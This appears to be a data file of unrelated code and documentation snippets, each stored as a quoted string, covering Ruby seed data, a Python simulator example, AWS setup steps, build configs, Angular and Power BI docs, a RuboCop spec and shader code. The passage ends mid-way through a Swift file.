:sections\n\n def self.admin; first(:role => \"admin\"); end\n def self.editor; first(:role => \"editor\"); end\n\n ##\n # Replace ActiveRecord method.\n #\n def self.find_by_id(id)\n self[id] rescue nil\n end\nend\n\n# We build some fake accounts\nadmin = Account.create(:name => \"DAddYE\", :role => \"admin\", :email => \"d.dagostino@lipsiasoft.com\",\n :password => \"some\", :password_confirmation => \"some\")\neditor = Account.create(:name => \"Dexter\", :role => \"editor\", :email => \"editor@lipsiasoft.com\",\n :password => \"some\", :password_confirmation => \"some\")\n\n%w(News Press HowTo).each do |c|\n admin.add_section(:name => c)\n editor.add_section(:name => c)\nend" +"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Simulator tests.\n\nExample on how to load different things with the simulators. This example is still in an experimental phase. For\nnow, only Bullet is fully-supported. We are working on the other ones, especially the Mujoco simulator.\n- Bullet: OK\n- Raisim: OK (todo: for collision bodies, it only accepts OBJ files)\n- MuJoCo: OK (todo: control still missing)\n- DART: OK, but capsules don't have collision shapes... (todo: fix some URDFs)\n- VREP: Not implemented yet + problem when importing PyRep with pybullet. Also, need to figure out how to call the\n 'loadURDF' plugin.\n- Isaac: not available yet.\n\"\"\"\n\nimport os\nfrom itertools import count\n\nfrom pyrobolearn.simulators.bullet import Bullet\nfrom pyrobolearn.simulators.raisim import Raisim\nfrom pyrobolearn.simulators.dart import Dart\nfrom pyrobolearn.simulators.mujoco import Mujoco\n# from pyrobolearn.simulators.vrep import VREP # Problem when importing PyRep with Pybullet\n# from pyrobolearn.simulators.isaac import Isaac # Not available yet\n\n\nsim = Bullet(render=True)\n# sim = Raisim(render=True)\n# sim = Dart(render=True)\n# sim = Mujoco(render=True)\n# sim = VREP(render=True)\n# sim = Isaac(render=True)\nprint(\"Gravity: {}\".format(sim.get_gravity()))\n\n# load floor\nfloor = sim.load_floor(dimension=20)\n\n# create box\nbox = sim.create_primitive_object(sim.GEOM_BOX, position=(0, 0, 2), mass=1, rgba_color=(1, 0, 0, 1))\nsphere = sim.create_primitive_object(sim.GEOM_SPHERE, position=(2," +"# Getting Started\n\n## Create an AWS account\n\nIn order to complete the hands-on content on this site, you'll need an AWS Account. We strongly recommend that you use a personal account or create a new AWS account to ensure you have the necessary access and that you do not accidentally modify corporate resources. Do **not** use an AWS account from the company you work for unless they provide sandbox accounts just for this purpose.\n\n## Create an IAM user (with admin permissions) \n\nIf you don't already have an AWS IAM user with admin permissions, please use the following instructions to create one:\n\n1. Browse to the AWS IAM console.\n2. Click **Users** on the left navigation and then click **Add User**.\n3. Enter a **User Name**, check the checkbox for **AWS Management Console access**, enter a **Custom Password**, and click **Next:Permissions**.\n4. Click **Attach existing policies directly**, click the checkbox next to the **AdministratorAccess**, and click **Next:review**.\n5. Click **Create User**\n6. Click **Dashboard** on the left navigation and use the **IAM users sign-in link** to login as the admin user you just created.\n\n## Add credits (optional) \n\nIf you are" +"//:\n// \\file\n// \\author Noah Johnson\n// \\brief Lets CMake define where source and install directories are\n\n// Note: The make system (e.g. CMake) should generate a file - bres_where.h - from\n// this, in which the macro is set correctly.\n// For non-CMake systems this might cause a problem. In particular if there is\n// no brad_where.h, some other stuff might not compile.\n// If we supply a default brad_where.h, it would be changed by CMake, and\n// may get checked back into the repository by accident.\n\n/* #ifndef BRES_LIB_DIR // file guard */\n/* #define BRES_LIB_DIR \"@CMAKE_LIBRARY_OUTPUT_DIRECTORY@\" */\n/* #endif */\n\n#ifndef BRES_SOURCE_DIR // file guard\n#define BRES_SOURCE_DIR \"@VXL_ROOT_SOURCE_DIR@\"\n#endif\n\n#ifndef BRES_INSTALL_DIR // file guard\n#define BRES_INSTALL_DIR \"@CMAKE_INSTALL_FULL_DATAROOTDIR@\"\n#endif" +"# Introduction to modules\n\nAngular apps are modular and Angular has its own modularity system called *NgModules*.\nNgModules are containers for a cohesive block of code dedicated to an application domain, a workflow, or a closely related set of capabilities. They can contain components, service providers, and other code files whose scope is defined by the containing NgModule. They can import functionality that is exported from other NgModules, and export selected functionality for use by other NgModules.\n\nEvery Angular app has at least one NgModule class, [the *root module*](guide/bootstrapping), which is conventionally named `AppModule` and resides in a file named `app.module.ts`. You launch your app by *bootstrapping* the root NgModule.\n\nWhile a small application might have only one NgModule, most apps have many more *feature modules*. The *root* NgModule for an app is so named because it can include child NgModules in a hierarchy of any depth.\n\n## NgModule metadata\n\nAn NgModule is defined by a class decorated with `@NgModule()`. The `@NgModule()` decorator is a function that takes a single metadata object, whose properties describe the module. The most important properties are as follows.\n\n* `declarations`: The [components](guide/architecture-components), *directives*, and *pipes* that belong to this NgModule.\n\n* `exports`: The subset" +"#!/usr/bin/env bash\n\n# Creates DeepCpG data files.\n\n\n# Source dependencies.\nsource \"./lib.sh\"\n\n# Set to 1 for testing and 0 for real run.\ntest_mode=1\n# Directory with CpG profiles.\ncpg_dir=\"../data/cpg\"\n# Directory with DNA sequences.\ndna_dir=\"../data/dna/mm10\"\n\n# Create data files.\ncmd=\"dcpg_data.py\n --cpg_profiles $cpg_dir/*.tsv\n --dna_files $dna_dir\n --out_dir $data_dir\n --dna_wlen 1001\n --cpg_wlen 50\n \"\nif [[ $test_mode -eq 1 ]]; then\n cmd=\"$cmd --nb_sample 1000\"\nfi\nrun $cmd\n\n# Compute statistics, e.g. the total number of CpG sites and the mean\n# methylation rate of each cell. Change the input `./data/*` to\n# `./data/c{1,3,5}*.h5` to compute statistics for a subset of the data, which is\n# useful for deciding how to split the data into training, validation, and test\n# set.\ncmd=\"dcpg_data_stats.py $data_dir/* | tee $data_dir.txt\"\nrun $cmd" +"using System;\nusing System.IO;\nusing System.Linq;\nusing System.Collections.Generic;\nusing System.Text.RegularExpressions;\nusing UnityEditor;\nusing UnityEditor.IMGUI.Controls;\nusing UnityEditor.VersionControl;\nusing UnityEngine;\nusing UObject = UnityEngine.Object;\n\nnamespace UnityEngine.ProBuilder.AssetIdRemapUtility\n{\n sealed class AssetTreeItem : TreeViewItem\n {\n string m_RelativePath;\n string m_FullPath;\n bool m_IsEnabled;\n bool m_IsDirectory;\n bool m_IsMixedState;\n\n public AssetTreeItem(int id, string fullPath, string relativePath) : base(id, 0)\n {\n m_IsDirectory = Directory.Exists(fullPath);\n m_FullPath = fullPath;\n m_RelativePath = relativePath;\n m_IsEnabled = true;\n displayName = m_FullPath.Replace(\"\\\\\", \"/\").Replace(Application.dataPath, \"Assets/\");\n }\n\n public bool enabled\n {\n get { return m_IsEnabled; }\n set { m_IsEnabled = value; }\n }\n\n public bool isDirectory\n {\n get { return m_IsDirectory; }\n set { m_IsDirectory = value; }\n }\n\n public string fullPath\n {\n get { return m_FullPath; }\n }\n\n public string relativePath\n {\n get { return m_RelativePath; }\n }\n\n public bool isMixedState { get { return m_IsMixedState; } }\n\n public void SetEnabled(bool isEnabled)\n {\n enabled = isEnabled;\n\n if (children != null)\n {\n foreach (var child in children)\n {\n AssetTreeItem asset = child as AssetTreeItem;\n\n if (asset != null)\n asset.SetEnabled(isEnabled);\n }\n }\n\n var upstream = parent;\n\n while (upstream != null)\n {\n var up = upstream as AssetTreeItem;\n\n if (up != null && up.children != null)\n {\n AssetTreeItem firstChild = up.children.FirstOrDefault() as AssetTreeItem;\n\n if (firstChild != null)\n {\n up.m_IsMixedState" +"INCLUDES += -I$(RIOTBASE)/pkg/lvgl/include\nINCLUDES += -I$(PKGDIRBASE)\n\n# Don't use relative includes in lvgl\nCFLAGS += -DLV_CONF_INCLUDE_SIMPLE\n\nifneq (,$(filter lvgl_contrib,$(USEMODULE)))\n DIRS += $(RIOTBASE)/pkg/lvgl/contrib\nendif\n\n# Configuration options\n# Graphical settings\nLVGL_COLOR_DEPTH ?= 16\nLVGL_COLOR_16_SWAP ?= 1\n\n# Memory settings\nLVGL_MEM_SIZE ?= 5U*1024U\n\n# Engine settings\nLVGL_INACTIVITY_PERIOD_MS ?= 5*MS_PER_SEC # 5s\nLVGL_TASK_HANDLER_DELAY_US ?= 5*US_PER_MS # 5ms\nLVGL_TASK_THREAD_PRIO ?= THREAD_PRIORITY_MAIN-1\n\n# Set the CFLAGS variable accordingly\nCFLAGS += -DLV_COLOR_DEPTH=$(LVGL_COLOR_DEPTH)\nCFLAGS += -DLV_COLOR_16_SWAP=$(LVGL_COLOR_16_SWAP)\nCFLAGS += -DLV_MEM_SIZE=$(LVGL_MEM_SIZE)\nCFLAGS += -DLVGL_INACTIVITY_PERIOD_MS=$(LVGL_INACTIVITY_PERIOD_MS)\nCFLAGS += -DLVGL_TASK_HANDLER_DELAY_US=$(LVGL_TASK_HANDLER_DELAY_US)\nCFLAGS += -DLVGL_TASK_THREAD_PRIO=$(LVGL_TASK_THREAD_PRIO)\n\n# lvgl module is not a concrete module, so declare it as a pseudomodule\nPSEUDOMODULES += lvgl\n\n# touch capabilities are available via a pseudomodule\nPSEUDOMODULES += lvgl_contrib_touch" +"package com.gentics.mesh.core.data.root;\n\nimport com.gentics.mesh.core.data.Branch;\nimport com.gentics.mesh.core.data.branch.HibBranch;\nimport com.gentics.mesh.core.data.project.HibProject;\nimport com.gentics.mesh.core.data.user.HibUser;\nimport com.gentics.mesh.core.rest.branch.BranchReference;\nimport com.gentics.mesh.core.rest.branch.BranchResponse;\nimport com.gentics.mesh.event.EventQueueBatch;\n\n/**\n * Aggregation vertex for Branches.\n */\npublic interface BranchRoot extends RootVertex, TransformableElementRoot {\n\n\tpublic static final String TYPE = \"branches\";\n\n\t/**\n\t * Get the project of this branch root.\n\t * \n\t * @return\n\t */\n\tHibProject getProject();\n\n\t/**\n\t * Create a new branch and make it the latest The new branch will be the initial branch, if it is the first created.\n\t *\n\t * @param name\n\t * branch name\n\t * @param creator\n\t * creator\n\t * @param batch\n\t * @return new Branch\n\t */\n\tdefault Branch create(String name, HibUser creator, EventQueueBatch batch) {\n\t\treturn create(name, creator, null, true, getLatestBranch(), batch);\n\t}\n\n\t/**\n\t * Create a new branch. The new branch will be the initial branch, if it is the first created.\n\t *\n\t * @param name\n\t * branch name\n\t * @param creator\n\t * creator\n\t * @param uuid\n\t * Optional uuid\n\t * @param setLatest\n\t * True to make it the latest branch\n\t * @param baseBranch\n\t * optional base branch. This can only be null if this is the first branch in the project.\n\t * @param batch\n\t * @return new Branch\n\t */\n\tBranch create(String name, HibUser creator, String uuid," +"====================\nAnsible project 2.11\n====================\n\nThis release schedule includes dates for the `ansible `_ package, with a few dates for the `ansible-base `_ package as well. All dates are subject to change. See :ref:`base_roadmap_2_11` for the most recent updates on ``ansible-base``.\n\n.. contents::\n :local:\n\nRelease schedule\n=================\n\n.. note:: Dates subject to change.\n\n- ????-??-?? Ansible 2.11 alpha freeze. No net new collections allowed after this date.\n- ????-??-?? Ansible collections freeze date for content moving between collections.\n- ????-??-?? Ansible 2.11 alpha.\n- ????-??-?? Ansible 2.11.0 beta1 and feature freeze.\n\n - No new modules or major features accepted after this date. In practice this means we will freeze the semver collection versions to compatible release versions. For example, if the version of community.crypto on this date was community-crypto-2.1.0; ansible-2.11.0 could ship with community-crypto-2.1.1. It would not ship with community-crypto-2.2.0.\n\n- ????-??-?? Ansible 2.11 final freeze/rc1.\n\n - After this date only changes blocking a release are accepted.\n - Collections will only be updated to a new version if a blocker is approved. Collection owners should discuss any blockers at a community IRC meeting (before this freeze) to decide whether to bump the version of the collection for a fix. See" +"# Website for Deep Learning Camp Jeju\n\n- [Website for Deep Learning Camp Jeju](#website-for-deep-learning-camp-jeju)\n - [Requirements](#requirements)\n - [Development](#development)\n - [Deployment](#deployment)\n - [Project Structures](#project-structures)\n\n## Requirements\n\n1. Install [bundler](http://bundler.io/)\n2. Run `bundle install`\n\n## Development\n\n```bash\n# Run local server\n$ make serve\n```\n\n## Deployment\n\n- Install ghp-import (`pip install ghp-import`)\n\n```bash\n# it will push everything inside of _site to origin/master_\nmake github\n```\n\n## Project Structures\n\n- `_includes` contains components\n- `_layouts` contains page template\n- `_sass` contains sass\n- `2018` contains actual contents\n\n```bash\ntree -L 1 -I '*.org' .\n```\n\n .\n \u251c\u2500\u2500 2017\n \u251c\u2500\u2500 2018\n \u251c\u2500\u2500 assets\n \u251c\u2500\u2500 _config_dev.yml\n \u251c\u2500\u2500 _config.yml\n \u251c\u2500\u2500 favicon.ico\n \u251c\u2500\u2500 Gemfile\n \u251c\u2500\u2500 Gemfile.lock\n \u251c\u2500\u2500 _includes\n \u251c\u2500\u2500 index.md\n \u251c\u2500\u2500 _layouts\n \u251c\u2500\u2500 Makefile\n \u251c\u2500\u2500 README.md\n \u251c\u2500\u2500 _sass\n \u2514\u2500\u2500 _site\n\n 7 directories, 8 files" +"The components in this area implement several file decompression\nmechanisms. They provide real-time decompression to permit inspection\n(rules) of the decompressed content.\n\nIn particular the components support these decompression options:\n\n1. Decompress SWF (Adobe Flash) files compressed with the ZLIB algorithm\n\n2. Optionally decompress SWF files compressed with the LZMA algorithm.\n This is only available if Snort ++ is built with the optional LZMA\n support.\n\n3. Decompress the Deflate compressed portions of PDF files.\n\nThe three modes are individually enabled/disabled at initialization time.\n\nAll parsing and decompression is incremental and allows inspection to\nproceed as the file is received and processed.\n\nSWF File Processing:\n\nSWF files exist in three forms: 1) uncompressed, 2) ZLIB compressed, and 3)\nLZMA compressed. SWF files begin with a file signature block (always\nuncompressed) to indicate the format of the balance of the file. The\nbalance of the file is formatted and processed as specified.\n\nPDF files are significantly more complex as the compressed content is\nembedded within the PDF syntax and one file may contain one or many\ncompressed segments.\n\nThus the PDF decompression engine implements a lightweight PDF file parser\nto locate the PDF Stream segments and then attempt to decompress Streams\nthat" +"module Vine where\r\nimport Rumpus\r\n\r\nstart :: Start\r\nstart = do\r\n\r\n let nMax = 100\r\n let branch 0 = return ()\r\n branch n = do\r\n let hue = fromIntegral n / fromIntegral nMax\r\n [x,y,z,w] <- replicateM 4 (randomRange (0,1))\r\n child <- spawnChild $ do\r\n myShape ==> Cube\r\n myPose ==> positionRotation (V3 0 0.4 0)\r\n (axisAngle (V3 x y z) w)\r\n mySize ==> V3 0.1 0.4 0.1\r\n myColor ==> colorHSL hue 0.8 0.8\r\n myUpdate ==> do\r\n now <- (*0.1) <$> getNow\r\n --setSize (V3 0.1 (sin now) 0.1)\r\n setRotation (V3 x y z) (sin now * w)\r\n lift $ inEntity child $ branch (n - 1)\r\n branch nMax\r\n return ()" +"// Type definitions for C3js 0.6\n// Project: http://c3js.org/, https://github.com/c3js/c3\n// Definitions by: Marc Climent \n// Gerin Jacob \n// Bernd Hacker \n// Dzmitry Shyndzin \n// Tim Niemueller \n// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped\n// TypeScript Version: 2.3\n\nimport * as d3 from \"d3\";\n\nexport as namespace c3;\n\nexport type PrimitiveArray = Array;\nexport type FormatFunction = (v: any, id: string, i: number, j: number) => void;\n\nexport interface TargetIds {\n ids: ArrayOrString;\n}\n\nexport type ArrayOrString = string[] | string;\n\nexport interface ChartConfiguration {\n /**\n * The CSS selector or the element which the chart will be set to. D3 selection object can be specified. If other chart is set already, it will be replaced with the new one (only one chart\n * can be set in one element).\n * If this option is not specified, the chart will be generated but not be set. Instead, we can access the element by chart.element and set it by ourselves.\n * Note: When chart is not binded, c3 starts observing if chart.element is binded by MutationObserver. In this case, polyfill is required in IE9 and IE10 becuase they do not support\n * MutationObserver. On" +"# Create custom GCF field types\n\nGCF allows you to register your own custom field types. Defining a field type means defining the `editForm` function of the field (and potentially a `configForm` as well): a higher order component used to edit the field's value.\n\n```js\nconst myCustomFieldType = {\n // Identifier of your field type, a good practice is use a namespace\n name: \"myplugin/field\",\n\n // Label of your field type\n label: \"My Custom Field Type\",\n\n // Function returning a Component used to edit the field value.\n editForm: fieldConfig => ({ value, onChange }) => {\n return (\n \n );\n }\n};\n\nwp.data.dispatch(\"gcf/fields\").register(myCustomFieldType);\n```\n\nLast thing, make sure your script registering your custom fields is loaded in Gutenberg before the editor initialization and in the GCF Admin page before the `gcf-config-app` script." +"6\n4\n8\n0\n4\n6\n2\n2\n4\n4\n4\n2\n2\n2\n4\n2\n0\n2\n6\n2\n2\n2\n4\n2\n2\n6\n4\n2\n33\n4\n2\n4\n6\n6\n6\n2\n6\n6\n2\n2\n2\n6\n0\n4\n10\n2\n6\n4\n4\n4\n4\n2\n2\n6\n8\n4\n2\n2\n2\n4\n6\n2\n2\n2\n2\n6\n6\n6\n4\n6\n6\n4\n6\n2\n4\n2\n8\n2\n4\n2\n2\n4\n8\n4\n2\n2\n4\n2\n4\n4\n6\n0\n2\n6\n4\n2\n4\n4\n4\n4\n2\n4\n6\n6\n8\n4\n4\n4\n2\n6\n8\n6\n6\n6\n8\n4\n8\n6\n4\n4\n6\n6\n6\n8\n8\n4\n6\n8\n4\n6\n8\n8\n8\n8\n6\n6\n4\n6\n4\n2\n4\n6\n6\n8\n4\n8\n6\n8\n10\n4\n8\n8\n8\n4\n4\n4\n6\n6\n10\n6\n8\n8\n15\n6\n8\n4\n6\n6\n6\n6\n2\n4\n6\n4\n8\n2\n8\n6\n4\n10\n6\n6\n6\n6\n4\n4\n8\n6\n8\n8\n4\n8\n4\n4\n6\n6\n4\n8\n6\n4" +".. _community_gwc_sqlite:\n\nGWC SQLite Plugin\n=================\n\nThis plugin provides integration with GWC SQLite based blob stores. At the moment only one blob store of this type is available, the MBTiles blob store.\n\n\nMBTiles Blob Store\n++++++++++++++++++\n\nThis blob store allow us to store tiles using the `MBTiles `_ specification (version 1.1) which defines a schema for storing tiles in an `SQLite `_ database with some restrictions regarding tiles formats and projections.\n\nMBTiles specification only supports JPEG and PNG formats and projection EPSG:3857 is assumed. The implemented blob store will read and write MBTiles files compliant with the specification but will also be able to write and read MBTiles files that use others formats and projections.\n\nUsing the MBTiles blob store will bring several benefits at the cost of some performance loss. The MBTiles storage uses a significantly smaller number of files, which results in easier data handling (e.g., backups, moving tiles between environments). In some cases the stored data will be more compact reducing the size of the data on disk.\n\nWhen compared to the file blob store this store has two limitations:\n\n* This store does not integrate with disk quota, this is a consequence of using database files." +"class Site::Client < Site\n validates_presence_of :url, :callback_url, :secret\n\n has_many :oauth2_tokens,\n foreign_key: 'site_id',\n dependent: :destroy\n\n has_many :authorization_codes,\n foreign_key: 'site_id',\n class_name: 'Oauth2Token::AuthorizationCode'\n\n has_many :access_tokens,\n foreign_key: 'site_id',\n class_name: 'Oauth2Token::AccessToken'\n\n has_many :refresh_tokens,\n foreign_key: 'site_id',\n class_name: 'Oauth2Token::RefreshToken'\n\n before_validation :set_secret,\n on: :create\n\n after_create :set_manager\n\n scope :managed_by, lambda { |actor|\n select(\"DISTINCT sites.*\").\n joins(actor: :sent_permissions).\n merge(Contact.received_by(actor)).\n merge(Permission.where(action: 'manage', object: nil))\n }\n\n %w{ url callback_url secret }.each do |m|\n define_method m do\n config[m]\n end\n\n define_method \"#{ m }=\" do |arg|\n config[m] = arg\n end\n end\n\n # Generate a new OAuth secret for this site client\n def refresh_secret!\n set_secret\n save!\n end\n\n private\n\n def set_secret\n self.secret = SecureRandom.hex(64)\n end\n\n def set_manager\n c = sent_contacts.create! receiver_id: author.id,\n user_author: author\n\n c.relation_ids = [ ::Relation::Manager.instance.id ]\n end\nend" +"#pragma once\n\n#include \n#include \n#include \n\nnamespace nall {\n auto main(Arguments arguments) -> void;\n\n auto main(int argc, char** argv) -> int {\n #if defined(PLATFORM_WINDOWS)\n CoInitialize(0);\n WSAData wsaData{0};\n WSAStartup(MAKEWORD(2, 2), &wsaData);\n _setmode(_fileno(stdin ), O_BINARY);\n _setmode(_fileno(stdout), O_BINARY);\n _setmode(_fileno(stderr), O_BINARY);\n #endif\n\n main(move(Arguments{argc, argv}));\n\n //when a program is running, input on the terminal queues in stdin\n //when terminating the program, the shell proceeds to try and execute all stdin data\n //this is annoying behavior: this code tries to minimize the impact as much as it can\n //we can flush all of stdin up to the last line feed, preventing spurious commands from executing\n //however, even with setvbuf(_IONBF), we can't stop the last line from echoing to the terminal\n #if !defined(PLATFORM_WINDOWS)\n auto flags = fcntl(fileno(stdin), F_GETFL, 0);\n fcntl(fileno(stdin), F_SETFL, flags | O_NONBLOCK); //don't allow read() to block when empty\n char buffer[4096], data = false;\n while(read(fileno(stdin), buffer, sizeof(buffer)) > 0) data = true;\n fcntl(fileno(stdin), F_SETFL, flags); //restore original flags for the terminal\n if(data) putchar('\\r'); //ensures PS1 is printed at the start of the line\n #endif\n\n return EXIT_SUCCESS;\n }\n}\n\nauto main(int argc, char** argv) -> int {\n return nall::main(argc, argv);\n}" +"import React, { useState } from \"react\";\nimport { useHotkeys } from \"react-hotkeys-hook\";\n\nimport SignUpModal from \"./SignUpModal\";\nimport SignUpCSS from \"./CSS\";\n\nimport SignUpImage from \"./SignUpImage\";\nimport SignUpForm from \"./SignUpForm\";\n\nexport default function SignUp() {\n\tconst [modalIsOpen, setModal] = useState(false);\n\tconst [data, setData] = useState({});\n\tconst {\n\t\tnome,\n\t\temail,\n\t\tcpf,\n\t\ttelefone,\n\t} = data;\n\n\t// Either click shadow or use esc when the main component is in focus to close the modal\n\t// Follow the example of https://johannesklauss.github.io/react-hotkeys-hook/docs-use-hotkeys#example\n\t// eslint-disable-next-line consistent-return\n\tuseHotkeys(\"esc\", () => setModal((prevModalIsOpen) => {\n\t\tif (prevModalIsOpen) {\n\t\t\treturn false;\n\t\t}\n\t}));\n\n\treturn (\n\t\t\n\t\t\t
    \n\t\t\t\t\n\t\t\t
    \n\t\t\t
    \n\t\t\t\t\n\t\t\t\t{/* Use redirect etc later */}\n\t\t\t\t\n\t\t\t
    \n\t\t
    \n\t);\n}" +"# frozen_string_literal: true\n\nRSpec.describe RuboCop::Cop::Lint::IneffectiveAccessModifier do\n subject(:cop) { described_class.new }\n\n context 'when `private` is applied to a class method' do\n it 'registers an offense' do\n expect_offense(<<~RUBY)\n class C\n private\n\n def self.method\n ^^^ `private` (on line 2) does not make singleton methods private. Use `private_class_method` or `private` inside a `class << self` block instead.\n puts \"hi\"\n end\n end\n RUBY\n end\n end\n\n context 'when `protected` is applied to a class method' do\n it 'registers an offense' do\n expect_offense(<<~RUBY)\n class C\n protected\n\n def self.method\n ^^^ `protected` (on line 2) does not make singleton methods protected. Use `protected` inside a `class << self` block instead.\n puts \"hi\"\n end\n end\n RUBY\n end\n end\n\n context 'when `private_class_method` is used' do\n context 'when `private_class_method` contains all private method names' do\n it \"doesn't register an offense\" do\n expect_no_offenses(<<~RUBY)\n class C\n private\n\n def self.method\n puts \"hi\"\n end\n\n private_class_method :method\n end\n RUBY\n end\n end\n\n context 'when `private_class_method` does not contain the method' do\n it 'registers an offense' do\n expect_offense(<<~RUBY)\n class C\n private\n\n def self.method2\n ^^^ `private` (on line 2) does not make singleton methods private. Use `private_class_method` or `private` inside a `class << self` block instead.\n puts \"hi\"\n end\n\n private_class_method :method\n end\n RUBY\n end\n end\n end\n\n context 'when no access" +"module Explorer.View.NotFound (notFoundView) where\n\nimport Prelude\n\nimport Data.Lens ((^.))\n\nimport Explorer.Lenses.State (lang)\nimport Explorer.Routes (Route(Dashboard), toUrl)\nimport Explorer.Types.Actions (Action(..))\nimport Explorer.Types.State (State)\n\nimport Pux.DOM.Events (onClick) as P\n\nimport Text.Smolder.HTML (div, a) as S\nimport Text.Smolder.HTML.Attributes (className, href) as S\nimport Text.Smolder.Markup ((!), (#!))\nimport Text.Smolder.Markup (text) as S\n\nimport Pux.DOM.HTML (HTML) as P\n\nnotFoundView :: State -> P.HTML Action\nnotFoundView state =\n let lang' = state ^. lang in\n S.div ! S.className \"explorer-404\"\n $ S.div ! S.className \"explorer-404__wrapper\"\n $ S.div ! S.className \"explorer-404__container\"\n $ S.a ! S.href (toUrl Dashboard)\n #! P.onClick (Navigate (toUrl Dashboard))\n ! S.className \"bg-image-404\"\n $ S.text \"\"" +"#!/usr/bin/env node\n\nimport commander from \"commander\";\nimport loglevel from \"loglevel\";\n\nimport { changelogs } from \"./changelogs\";\nimport { clean } from \"./clean\";\nimport { configs } from \"./configs\";\nimport { CLEAN, DEBUG, SILENT } from \"./constants\";\nimport { indexer } from \"./indexer\";\nimport { libsize } from \"./libsize\";\nimport { release, RELEASE_TYPES, toReleaseType } from \"./release\";\nimport { sandbox } from \"./sandbox\";\nimport { sassdoc } from \"./sassdoc\";\nimport { shared } from \"./shared\";\nimport { themes } from \"./themes\";\nimport { umd } from \"./umd\";\nimport { copyStyles } from \"./utils\";\nimport { variables } from \"./variables\";\nimport { watch } from \"./watch\";\n\nconst argv = process.argv.slice(2);\n\nif (argv.includes(DEBUG)) {\n loglevel.setLevel(\"debug\");\n} else if (argv.includes(SILENT)) {\n loglevel.setLevel(\"error\");\n} else {\n loglevel.setLevel(\"info\");\n}\n\nconst createCommand = (\n command: string,\n cleanable: boolean = false\n): commander.Command => {\n const instance = commander\n .command(command)\n .option(DEBUG, \"Enables the verbose logging to help debug errors.\")\n .option(SILENT, \"Disables all logging.\");\n\n if (cleanable) {\n return instance.option(\n CLEAN,\n \"Removes the existing files before executing.\"\n );\n }\n\n return instance;\n};\n\ncreateCommand(\"clean\")\n .description(\"Cleans all the distributables for all publishable packages.\")\n .action(() => clean());\n\ncreateCommand(\"styles\")\n .description(\n \"Copies all the SCSS files into the dist folder as well as creating non-webpack" +"#include \"GlobalInclude.hlsli\"\n\nTexture2D flowmap : register(t1);\nTexture2D verticalFilter1 : register(t2);\nTexture2D obstacle : register(t7);\n\nSamplerState wrapSampler : register(s0);\nSamplerState clampSampler : register(s1);\n\n[domain(\"quad\")]\nDS_OUTPUT main(\n\tHS_CONSTANT_DATA_OUTPUT input,\n\tfloat2 domain : SV_DomainLocation, // float2 for quad\n\tconst OutputPatch patch)\n{\n DS_OUTPUT Output;\n \n float3 pos = BLERP3(patch[0].pos, patch[1].pos, patch[3].pos, patch[2].pos, domain);\n\t\n float2 texCoord = BLERP2(patch[0].texCoord, patch[1].texCoord, patch[3].texCoord, patch[2].texCoord, domain);\n //float3 nor = float3(0, 1, 0); //PER VERTEX NORMAL\n\n if(mode==0||mode==10||mode==11)//0 - default, 10 - normal\n {\n float ob = obstacle.SampleLevel(clampSampler, texCoord, 0).x;\n if (ob > obstacleThresholdWave)\n {\n //do nothing\n }\n else\n {\n float4 deviation = Flow(texCoord, time * timeScale * flowSpeed, flowmap, wrapSampler, verticalFilter1, wrapSampler);\n //float4 deviation = FlowHeightWithNormal(texCoord, time * timeScale * flowSpeed, t1, s2, t2, s2, nor); //PER VERTEX NORMAL\n pos.y += deviation.y;\n pos.x += deviation.x;\n pos.z += deviation.z;\n }\n }\n\t\n Output.pos = mul(mul(viewProj, model), float4(pos, 1));\n Output.texCoord = texCoord;\n\tOutput.PosW = pos;\n //Output.nor = nor; //PER VERTEX NORMAL\n\n return Output;\n}" +"---\ntitle: Using Microsoft Cloud App Security controls in Power BI\ndescription: Learn how to use Microsoft Cloud App Security together with Power BI\nauthor: paulinbar\nms.reviewer: ''\n\nms.service: powerbi\nms.subservice: powerbi-eim\nms.topic: how-to\nms.date: 06/15/2020\nms.author: painbar\n\nLocalizationGroup: Data from files\n---\n# Using Microsoft Cloud App Security controls in Power BI\n\nUsing Cloud App Security with Power BI, you can help protect your Power BI reports, data, and services from unintended leaks or breaches. With Cloud App Security, you create conditional access policies for your organization\u2019s data, using real-time session controls in Azure Active Directory (Azure AD), that help to ensure your Power BI analytics are secure. Once these policies have been set, administrators can monitor user access and activity, perform real-time risk analysis, and set label-specific controls. \n\n![Using Cloud App Security controls pane](media/service-security-using-microsoft-cloud-app-security-controls/cloud-app-security-controls-01.png)\n\nYou can configure Cloud App Security for all sorts of apps and services, not only Power BI. You\u2019ll need to configure Cloud App Security to work with Power BI to benefit from Cloud App Security protections for your Power BI data and analytics. For more information about Cloud App Security, including an overview of how it works, the dashboard, and app risk scores, see" +"structure Statistics : STATISTICS = struct\n\n type stat = {name: string, enabled: bool ref, table: (string, int ref) Util.alist ref}\n\n fun new s r = {name=s,enabled=r,table=ref (Util.emptyAlist())}\n\n fun incr {name,table,enabled} s = \n if !enabled then\n case Util.lookupAlist (!table) s of\n SOME r => r := !r + 1\n | NONE => table := Util.extendAlist (!table) (s,ref 1)\n else ()\n\n fun report {name,enabled,table} =\n if !enabled then\n let val sz = List.foldl (fn ((s,_),a) => (Int.max(size s,a))) 0 (!table)\n val () = Util.prln (\"[\" ^ name ^ \" Statistics Report]\")\n val () = List.app (fn (s,r) => \n let val line = StringCvt.padRight #\" \" sz s ^ \" -> \" ^ Int.toString(!r)\n in Util.prln (\" \" ^ line)\n end) (!table)\n in ()\n end\n else ()\nend" +"---\nlayout: article_eclipse\npart: Reference\n---\n\n# Editor\n\nThe Erlang editor provides specialized features for editing Erlang related\nfiles.\n\n![Editor view](images/view_editor.png){: .frame }\n\nAssociated with the editor is an Erlang-specific outline view, which\nshows the structure of the active `.erl` or `.hrl` file. It is updated as you\nedit these files.\n\nThe editor includes the following features:\n\n* Syntax highlighting\n* Content/code assist; auto completion of function calls, display of\nfunction documentation)\n\nThe most common way to invoke the Erlang editor is to open a file from the\nErlang Navigator. If you want to open an Erlang module by name, the keyboard\nshortcut is **Ctrl+Shift+M** or **Ctrl+Alt+Shift+M**." +"//\n// GooeyEffect.swift\n// gooey-cell\n//\n// Created by \u041f\u0440\u0435\u0433\u0435\u0440 \u0413\u043b\u0435\u0431 on 22/01/2019.\n// Copyright \u00a9 2019 Cuberto. All rights reserved.\n//\n\nimport UIKit\nimport pop\n\npublic class GooeyEffect {\n public enum Direction {\n case toRight, toLeft\n }\n \n public struct Config {\n let color: UIColor?\n let image: UIImage?\n \n public init(color: UIColor?, image: UIImage?) {\n self.color = color\n self.image = image\n }\n }\n \n private struct SnapshotLayerInfo {\n let position: CGPoint\n let opacity: Float\n }\n\n private struct CircleLayerInfo {\n let 